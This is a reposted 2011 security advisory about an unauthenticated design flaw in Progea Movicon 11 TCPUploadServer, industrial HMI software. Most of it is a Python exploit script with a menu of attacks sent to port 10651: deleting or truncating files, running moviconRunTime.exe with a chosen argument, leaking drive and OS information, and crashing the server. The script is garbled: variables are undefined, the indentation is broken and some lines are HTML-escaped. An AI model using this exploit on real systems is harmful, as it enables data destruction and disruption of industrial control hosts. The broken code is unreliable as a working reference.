rogea Movicon TCPUploadServer Remote Exploit

Type securityvulns
Reporter Securityvulns
Modified 2011-03-23T00:00:00



Progea Movicon TCPUploadServer Remote Exploit

Jeremy Brown / jbrown at patchtuesday dot org

Mar 2011

TCPUploadServer allows remote users to execute functions on the server

without any form of authentication. Impacts include deletion of arbitrary

files, execution of a program with an arbitrary argument, crashing the

server, information disclosure, and more. This design flaw puts the host

running this server at risk of potentially unauthorized functions being

executed on the system.

Tested on Progea Movicon 11 TCPUploadServer running on Windows


import sys import socket


funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V

if len(sys.argv)<3: print "Progea Movicon TCPUploadServer Remote Exploit" print "Usage: %s <target> <function> [data]"%sys.argv[0] print "\nWhat would you like to do?\n" print "[1] Create a folder" print "[2] Overwrite a file with NULL and cause 100%% CPU" print "[3] Delete a file" print "[4] Execute moviconRunTime.exe with a specified argument" print "[5] Create a desktop shortcut" print "[6] Retrieve drive information" print "[7] Retrieve os service pack" print "[8] Crash the server\n" print "* Default data is \"test\"" sys.exit(0)

target=sys.argv[1] port=10651 cs=target,port


if len(sys.argv)==4: data=sys.argv[3] else: data="test"

if func not in funcs: print "Invalid function" sys.exit(1)

if(func==1): print "Crafting a packet to create the folder \"%s\"..."%data pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))

elif(func==2): print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data)) # O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on

elif(func==3): print "Crafting a packet to delete the file \"%s\"..."%data pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))

elif(func==4): print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))

elif(func==5): print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))

elif(func==6): print "Crafting a packet to retrieve drive information..." pkt=hdr+"6"+"\x01"

elif(func==7): print "Crafting a packet to retrieve os service pack..." pkt=hdr+"7"+"\x00"

elif(func==8): print "Crafting a packet to crash the server..." pkt=hdr+"B"+"\x00"

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect(cs)

sock.send(pkt) sock.send(pkt)

print "\nPacket sent!"

if((func==6)|(func==7)): info=sock.recv(128)

      print &quot;&#92;nRetrieved info:&#92;n&quot;
           print &quot;&#37;s&quot;&#37;info[6:]
           print &quot;&#37;s&quot;&#37;info[22:]
      print &quot;&#92;nNo info&quot;